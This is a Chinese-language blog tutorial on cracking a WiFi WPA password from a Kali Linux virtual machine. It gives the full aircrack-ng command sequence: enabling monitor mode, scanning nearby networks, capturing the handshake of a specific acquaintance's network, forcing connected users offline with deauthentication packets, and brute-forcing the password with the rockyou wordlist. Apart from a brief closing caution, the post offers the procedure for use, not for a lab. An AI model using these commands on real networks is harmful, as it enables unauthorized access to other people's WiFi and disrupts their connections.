kali虛擬機暴力破解wifi密碼

硬件:Mac/windows電腦,具有monitor模式的無線網(wǎng)卡

軟件:vmware fusion,kali鏡像(iso文件即可)

以下均為干貨,如有問題也可自行谷歌、百度。

勸君更盡一杯酒,我出陽關(guān)無故人。。。

1.搭建kali虛擬機,網(wǎng)上很多教程。

2.把你的無線網(wǎng)卡插進物理機,并配置給kali虛擬機 (就問你是不是干貨?)

3.在shell里輸入airmon-ng查看下網(wǎng)卡信息:

4.輸入airmon-ng start wlan0開啟網(wǎng)卡監(jiān)聽模式:

5.再次查看網(wǎng)卡信息,注意這里一定是mon結(jié)尾,否則是你的網(wǎng)卡無monitor模式:

6.命令行輸入:airodump-ng wlan0mon??(airodump-ng后接網(wǎng)卡名,去掃面周圍wifi的信息,ctrl+c停止),掃出來如下圖:

這里解釋幾個參數(shù):

BSSID:MAC地址。

PWR:信號強度,越小信號越強。

#Data:傳輸?shù)臄?shù)據(jù)。

CH:信號頻道,只有在一個頻道才可進行下一步操作。

ESSID:wifi的名稱,中文的可能會亂碼。

7.抓包:在shell中輸入airodump-ng -c 6 --bssidC6:F1:28:14:F1:F9?-w/home wlan0mon

這里我要破解的wifi是Nokia7(熟人比較好下手),所以頻道和mac地址就要選擇指定wifi的,另外home是指抓到報文后的報文名。

8.新建一個窗口 ,輸入aireplay-ng -0 0 -a mac地址 網(wǎng)卡名 ,這一步是為了方便觀察交互的過程,可以跳過。

9.當窗口右上角出現(xiàn)WPA handshake時說明抓包成功,我們還可以看到以獲取的cap報文:

10.進入/usr/share/wordlists/路徑下kali自帶的密碼字典rockyou.txt.gz進行解壓:gzip -d rockyou.txt.gz

11.在shell中輸入aircrack-ng -w /usr/share/wordlists/rockyou.txt home-01.cap,這個過程就是暴力破解了,成功后顯示密碼字符串:

12.愉快上網(wǎng)了,請叫我行走的wifi。但是這都是比較理想化的密碼,暴力破解需要運氣的成分,所以還是不要嘗試破解反爆破的密碼,畢竟太耗性能。另外,這種釣魚wifi玩玩就可以了,不要觸碰底線哦!

補充:1.獲取包的前提首先是由用戶連接此wifi 2.我們抓取的包是新用戶連接此wifi的過程產(chǎn)生的流量,但是如果沒有新用戶怎么辦?那么就讓他斷開重連??墒菓{啥人家斷開呢?所以這是需要我們主動發(fā)起攻擊讓其斷開網(wǎng)絡(luò),這時候我們是一直抓包的,如果用戶有知覺他會重連的,那么機會就來了。在第七步的抓包圖片下半部分有一個station參數(shù),那里顯示的是連接此wifi的用戶mac地址,記住其中一個并打開新的shell輸入:aireplay-ng -0 2 -aC6:F1:28:14:F1:F9-c xx:xx:xx:xx:xx:xx wlan0mon,前邊是wifi的mac地址,后邊是被攻擊者的mac地址。aireplay-ng的工具,它可以強制用戶斷開wifi連接;原理是,給連接到wifi的一個設(shè)備發(fā)送一個deauth(反認證)包,讓那個設(shè)備斷開wifi,隨后它自然會再次連接wifi。當我們多次嘗試攻擊并成功后就會獲取報文,也就是說當窗口右上角出現(xiàn)WPA handshake時說明抓包成功。于是我們就可以接著進行暴力破解了。

參數(shù)解釋:

-0表示發(fā)起deauthentication攻擊

-a指定無線路由器BSSID

-c指定強制斷開的設(shè)備

請關(guān)注微信公眾號:AI Engine

最后編輯于
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請聯(lián)系作者
【社區(qū)內(nèi)容提示】社區(qū)部分內(nèi)容疑似由AI輔助生成,瀏覽時請結(jié)合常識與多方信息審慎甄別。
平臺聲明:文章內(nèi)容(如有圖片或視頻亦包括在內(nèi))由作者上傳并發(fā)布,文章內(nèi)容僅代表作者本人觀點,簡書系信息發(fā)布平臺,僅提供信息存儲服務。

相關(guān)閱讀更多精彩內(nèi)容

友情鏈接更多精彩內(nèi)容